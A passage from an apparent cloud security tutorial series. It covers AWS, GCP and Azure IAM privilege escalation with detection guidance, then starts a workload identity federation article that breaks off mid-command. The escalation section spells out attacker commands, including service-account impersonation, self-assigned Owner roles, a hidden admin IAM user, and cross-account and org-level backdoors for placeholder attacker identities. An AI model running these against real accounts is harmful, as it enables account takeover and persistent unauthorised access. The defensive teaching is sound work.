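        f"{IMDS_BASE}/latest/meta-data/iam/security-credentials/{role_name}",
        headers={"X-aws-ec2-metadata-token": token},
    )


step1 = token_request()
step2 = credentials_request("EXAMPLE_TOKEN", "MyAppRole")
print(step1.get_method(), step1.full_url)
print(step2.get_method(), step2.full_url)
```

An attacker who can only make the vulnerable application fetch a URL cannot set the method to PUT or add custom headers, so step 1 fails and step 2 is rejected when `HttpTokens=required`.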

High-Risk AWS Permissions Reference

| Permission | Why It’s Dangerous |
|---|---|
| iam:PassRole with Resource: * | Assign any role to any service; enables immediate privilege escalation |
| iam:CreatePolicyVersion | Rewrite any policy to grant anything; full account takeover in one API call |
| iam:AttachRolePolicy | Attach AdministratorAccess to any role |
| iam:UpdateAssumeRolePolicy | Add any principal to any role’s trust policy |
| iam:CreateAccessKey on other users | Create persistent credentials for any IAM user |
| lambda:UpdateFunctionCode on privileged Lambda | Inject malicious code into an elevated function |
| secretsmanager:GetSecretValue with Resource: * | Read every secret in the account |
| ssm:GetParameter with Resource: * | Read all Parameter Store values, which often contain credentials |
| iam:CreateRole + iam:AttachRolePolicy | Create and arm a backdoor role |

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

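# Attacker has iam.serviceAccounts.actAs on an admin SA: enough to attach it to a
# resource they control (VM, Cloud Function) and run code as that SA.
# Direct impersonation, as shown here, additionally requires
# iam.serviceAccounts.getAccessToken (roles/iam.serviceAccountTokenCreator).
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com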

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  --iam-account=SA_EMAIL
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee USER_EMAIL \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM (URL kept on one line: a backslash-newline inside single quotes is not a continuation)
curl -H 'Metadata: true' \
  'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor, hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:ATTACKER_EMAIL" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.
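Auditing those external trust relationships is mechanical once the trust policies are exported. The sketch below assumes a hypothetical mapping of role name to trust policy document and a known set of your own account IDs; the role names and account numbers are made up for illustration.

```python
import re

ACCOUNT_IN_ARN = re.compile(r"^arn:aws:iam::(\d{12}):")


def external_trusts(roles, own_account_ids):
    """Return (role name, principal) pairs that trust an account outside the org."""
    findings = []
    for role_name, trust_policy in roles.items():
        for stmt in trust_policy.get("Statement", []):
            if stmt.get("Effect") != "Allow":
                continue
            principal = stmt.get("Principal", {})
            aws = principal.get("AWS", []) if isinstance(principal, dict) else [principal]
            for value in aws if isinstance(aws, list) else [aws]:
                match = ACCOUNT_IN_ARN.match(value)
                # Bare account IDs and "*" are valid principals too.
                account = match.group(1) if match else value
                if account not in own_account_ids:
                    findings.append((role_name, value))
    return findings


def allow(principal):
    return {"Statement": [{"Effect": "Allow", "Principal": principal, "Action": "sts:AssumeRole"}]}


roles = {
    "svc-monitoring-role": allow({"AWS": "arn:aws:iam::999999999999:root"}),
    "AppRole": allow({"Service": "ec2.amazonaws.com"}),
    "DeployRole": allow({"AWS": "arn:aws:iam::123456789012:role/ci"}),
}
suspicious = external_trusts(roles, own_account_ids={"123456789012"})
print(suspicious)
```

Legitimate third-party integrations will show up here as well, so the output is a review list to reconcile against known vendors rather than a list of confirmed backdoors.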


Detection — What to Alert On

| Activity | Event to Watch | Priority |
|---|---|---|
| Role trust policy modified | UpdateAssumeRolePolicy | Critical |
| New IAM user created | CreateUser | High |
| Policy version created | CreatePolicyVersion | High |
| Policy attached to role | AttachRolePolicy, PutRolePolicy | High |
| SA key created (GCP) | google.iam.admin.v1.CreateServiceAccountKey | High |
| Role assignment at subscription scope (Azure) | roleAssignments/write at /subscriptions/ | Critical |
| CloudTrail logging disabled | StopLogging, DeleteTrail | Critical |
| GetSecretValue at unusual hours | secretsmanager:GetSecretValue | Medium |

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.
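As a starting point, the AWS rows of the table translate directly into a lookup over CloudTrail records. This sketch assumes events arrive as dictionaries with the standard `eventName` and `userIdentity.arn` fields; the priority map mirrors the table, and the GCP and Azure rows are left out for brevity.

```python
ALERT_PRIORITY = {
    "UpdateAssumeRolePolicy": "critical",
    "StopLogging": "critical",
    "DeleteTrail": "critical",
    "CreateUser": "high",
    "CreatePolicyVersion": "high",
    "AttachRolePolicy": "high",
    "PutRolePolicy": "high",
}


def triage(events):
    """Return (priority, event name, caller ARN) for watched events, critical first."""
    alerts = []
    for event in events:
        name = event.get("eventName")
        priority = ALERT_PRIORITY.get(name)
        if priority:
            caller = event.get("userIdentity", {}).get("arn", "unknown")
            alerts.append((priority, name, caller))
    return sorted(alerts, key=lambda alert: (alert[0] != "critical", alert[1]))


dev_role = "arn:aws:sts::123456789012:assumed-role/DevRole/session"
sample_events = [
    {"eventName": "DescribeInstances", "userIdentity": {"arn": dev_role}},
    {"eventName": "CreatePolicyVersion", "userIdentity": {"arn": dev_role}},
    {"eventName": "UpdateAssumeRolePolicy", "userIdentity": {"arn": dev_role}},
]
alerts = triage(sample_events)
for alert in alerts:
    print(alert)
```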


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3: CloudTrail doesn't log data plane events by default   ║
║                                                                      ║
║  S3 object reads (GetObject) and Lambda invocations are data events: ║
║  CloudTrail does not log them unless you explicitly enable Data      ║
║  Events. An attacker exfiltrating objects this way leaves no trace   ║
║  in a default CloudTrail configuration.                              ║
║                                                                      ║
║  GetSecretValue and SSM GetParameter are read-only management        ║
║  events: logged by default, but dropped by trails configured to      ║
║  record write-only management events.                                ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail, and confirm    ║
║  the trail records read management events as well as writes.         ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

| Framework | Reference | What It Covers Here |
|---|---|---|
| CISSP | Domain 6: Security Assessment and Testing | IAM attack paths are the foundation of cloud penetration testing and access review methodology |
| CISSP | Domain 5: Identity and Access Management | Defensive IAM design requires understanding offensive technique; you cannot protect paths you don’t know exist |
| ISO 27001:2022 | 8.8 Management of technical vulnerabilities | IAM misconfigurations are technical vulnerabilities: identifying and remediating privilege escalation paths |
| ISO 27001:2022 | 8.16 Monitoring activities | Detection signals and alerting on IAM mutations as part of continuous monitoring |
| SOC 2 | CC7.1 | Threat and vulnerability identification: this episode maps the threat model for cloud IAM |
| SOC 2 | CC6.1 | Understanding attack paths informs the design of logical access controls that actually hold |

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
  • Enable CloudTrail Data Events: default logging misses S3 object reads and Lambda invocations entirely, and write-only trails also drop GetSecretValue and SSM GetParameter calls
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies


OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

Reading Time: 12 minutes





TL;DR

  • Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
  • The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
  • AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
  • GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
  • Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
  • Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 15m–12h, 1h default  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable only until it expires (about 1 hour by default), audience-bound

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.


Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to IAM users created for engineers who had since left the company. Their console access had been removed, but the access keys were still valid, because in AWS an access key stays active until it is explicitly deactivated or deleted, regardless of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.


Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.


The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1 hour by default, configurable up to 12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.
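
To make the three checks concrete, here is a minimal Python sketch of the claim-matching step only. It assumes the JWT signature has already been verified against the IdP's public keys (not shown). The function names, the TRUST dictionary layout, and the example issuer URL are all hypothetical and are not any provider's API.

```python
import base64
import json


def b64url(data: bytes) -> str:
    """Base64url-encode without padding, the way JWT segments are encoded."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def decode_claims(jwt: str) -> dict:
    """Return the payload claims of a JWT. This does NOT verify the signature."""
    payload = jwt.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore the stripped padding
    return json.loads(base64.urlsafe_b64decode(payload))


def claims_match_trust(claims: dict, trust: dict) -> bool:
    """Compare issuer, audience, and subject with a registered trust relationship."""
    return (
        claims.get("iss") == trust["issuer"]
        and claims.get("aud") == trust["audience"]
        and claims.get("sub") == trust["subject"]
    )


# Hypothetical trust relationship, mirroring what a trust policy would pin.
TRUST = {
    "issuer": "https://oidc.example.com/id/CLUSTER",
    "audience": "sts.amazonaws.com",
    "subject": "system:serviceaccount:production:app-backend",
}


def make_demo_token(claims: dict) -> str:
    """Build a token with a placeholder signature, for illustration only."""
    header = b64url(json.dumps({"alg": "none"}).encode())
    body = b64url(json.dumps(claims).encode())
    return f"{header}.{body}.placeholder"


good = make_demo_token(
    {"iss": TRUST["issuer"], "aud": TRUST["audience"], "sub": TRUST["subject"]}
)
bad = make_demo_token(
    {"iss": TRUST["issuer"], "aud": TRUST["audience"],
     "sub": "system:serviceaccount:dev:app-backend"}
)

print(claims_match_trust(decode_claims(good), TRUST))  # True
print(claims_match_trust(decode_claims(bad), TRUST))   # False
```

The second token fails only because its namespace differs, which is the property the trust conditions exist to enforce. Real tokens may carry the audience as a list, which this sketch does not handle.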


AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

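# Step 2: register this OIDC issuer with IAM
# The issuer URL includes a path (/id/...), so connect to the hostname only.
# Note: AWS documents using the thumbprint of the top intermediate CA in the chain;
# this one-liner fingerprints the first certificate returned, so check the result.
OIDC_HOST=$(echo "${OIDC_ISSUER#https://}" | cut -d/ -f1)
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -servername "${OIDC_HOST}" -connect "${OIDC_HOST}:443" </dev/null 2>/dev/null \
    | openssl x509 -fingerprint -sha1 -noout | cut -d= -f2 | tr -d ':')"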

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json

# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The amazon-eks-pod-identity-webhook, a mutating admission webhook that EKS runs for IRSA (despite the name, it is separate from the newer EKS Pod Identity feature described below), injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE, pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening: it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.
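
As a rough illustration of what the SDK does with those two variables, the sketch below reads them and assembles the parameters for an sts:AssumeRoleWithWebIdentity call. It stops short of calling AWS. The helper name and the default session name are my own assumptions; the real SDK credential providers are more involved (caching, refresh, retries).

```python
import os
import tempfile


def web_identity_request_from_env(env: dict) -> dict:
    """Assemble AssumeRoleWithWebIdentity parameters from the injected variables.

    Hypothetical helper: it only builds the request parameters, it sends nothing.
    """
    with open(env["AWS_WEB_IDENTITY_TOKEN_FILE"]) as f:
        token = f.read().strip()
    return {
        "RoleArn": env["AWS_ROLE_ARN"],
        # "demo-session" is an arbitrary fallback chosen for this sketch.
        "RoleSessionName": env.get("AWS_ROLE_SESSION_NAME", "demo-session"),
        "WebIdentityToken": token,
    }


# Demo with a fake token file standing in for the projected token volume.
with tempfile.TemporaryDirectory() as tmp:
    token_path = os.path.join(tmp, "token")
    with open(token_path, "w") as f:
        f.write("header.payload.signature\n")
    params = web_identity_request_from_env({
        "AWS_WEB_IDENTITY_TOKEN_FILE": token_path,
        "AWS_ROLE_ARN": "arn:aws:iam::123456789012:role/app-backend-s3-role",
    })

print(params["RoleArn"])
print(params["RoleSessionName"])
```

Because the token is re-read from the file on each call, a refreshed projected token is picked up without restarting the application.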

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.
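
If you generate these trust policies rather than hand-editing JSON, a small helper keeps the sub and aud conditions pinned every time. This is a sketch under the same assumptions as the shell example above; the function name and the example OIDC ID are hypothetical.

```python
import json


def irsa_trust_policy(account_id: str, oidc_id: str,
                      namespace: str, service_account: str) -> dict:
    """Build an IRSA trust policy pinned to exactly one service account."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {
                "Federated": f"arn:aws:iam::{account_id}:oidc-provider/{oidc_id}"
            },
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    # Exact match on namespace AND service account name.
                    f"{oidc_id}:sub": f"system:serviceaccount:{namespace}:{service_account}",
                    f"{oidc_id}:aud": "sts.amazonaws.com",
                }
            },
        }],
    }


policy = irsa_trust_policy(
    account_id="123456789012",
    oidc_id="oidc.eks.us-east-1.amazonaws.com/id/EXAMPLE",  # placeholder ID
    namespace="production",
    service_account="app-backend",
)
print(json.dumps(policy, indent=2))
```

Taking namespace and service account as separate required arguments makes it harder to end up with a namespace-wide wildcard by accident.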

EKS Pod Identity — The Simpler Modern Approach

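AWS released Pod Identity as a simpler alternative to IRSA. There is no per-cluster OIDC provider to register and no trust policy with OIDC conditions to maintain; the role’s trust policy instead allows the EKS service principal pods.eks.amazonaws.com to call sts:AssumeRole and sts:TagSession. The cluster-side setup is two commands: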

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.
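
One detail that is easy to miss: a role used with Pod Identity needs a different trust policy from an IRSA role. The sketch below builds the trust policy as I understand it from the EKS documentation, trusting the pods.eks.amazonaws.com service principal. The function name is hypothetical, and you should confirm the exact statement against current AWS docs before using it.

```python
import json


def pod_identity_trust_policy() -> dict:
    """Trust policy letting the EKS Pod Identity service assume the role."""
    return {
        "Version": "2012-10-17",
        "Statement": [{
            "Effect": "Allow",
            "Principal": {"Service": "pods.eks.amazonaws.com"},
            # TagSession is needed because Pod Identity attaches session tags
            # (cluster, namespace, service account) to the assumed-role session.
            "Action": ["sts:AssumeRole", "sts:TagSession"],
        }],
    }


print(json.dumps(pod_identity_trust_policy(), indent=2))
```

The same trust policy can be reused across clusters, because the binding to a specific namespace and service account lives in the Pod Identity association rather than in the role.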

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

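# Register your internal CA as a trust anchor (the CLI expects the PEM text itself)
TRUST_ANCHOR_ARN=$(aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --enabled \
  --source "sourceType=CERTIFICATE_BUNDLE,sourceData={x509CertificateData=$(cat ca-cert.pem)}" \
  --query "trustAnchor.trustAnchorArn" --output text)

# Create a profile listing the roles that certificate holders may assume.
# The role's own trust policy must also trust rolesanywhere.amazonaws.com.
PROFILE_ARN=$(aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --enabled \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --query "profile.profileArn" --output text)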

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or AWS Private CA) is the proof of identity. No access key is distributed to the server, just a certificate that your CA signed and that you can revoke, provided the resulting CRL is imported into IAM Roles Anywhere so it knows about the revocation.


GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="app-backend@my-project.iam.gserviceaccount.com"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"

# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: app-backend@my-project.iam.gserviceaccount.com

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.
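
The two strings that have to line up are the IAM member on the GCP side and the annotation on the Kubernetes side. A small sketch of how they are derived from the same inputs follows; the helper names are hypothetical.

```python
def workload_identity_member(project_id: str, namespace: str, ksa_name: str) -> str:
    """IAM member string that identifies a Kubernetes service account to GCP."""
    return f"serviceAccount:{project_id}.svc.id.goog[{namespace}/{ksa_name}]"


def gcp_service_account_email(project_id: str, gsa_name: str) -> str:
    """Email of a GCP service account, used in the K8s annotation."""
    return f"{gsa_name}@{project_id}.iam.gserviceaccount.com"


member = workload_identity_member("my-project", "production", "app-backend")
email = gcp_service_account_email("my-project", "app-backend")

print(member)  # serviceAccount:my-project.svc.id.goog[production/app-backend]
print(email)   # app-backend@my-project.iam.gserviceaccount.com
```

If the namespace or service account name in the member string differs from what the pod actually runs as, the binding silently does not apply and the metadata server returns no token for that service account.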


Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
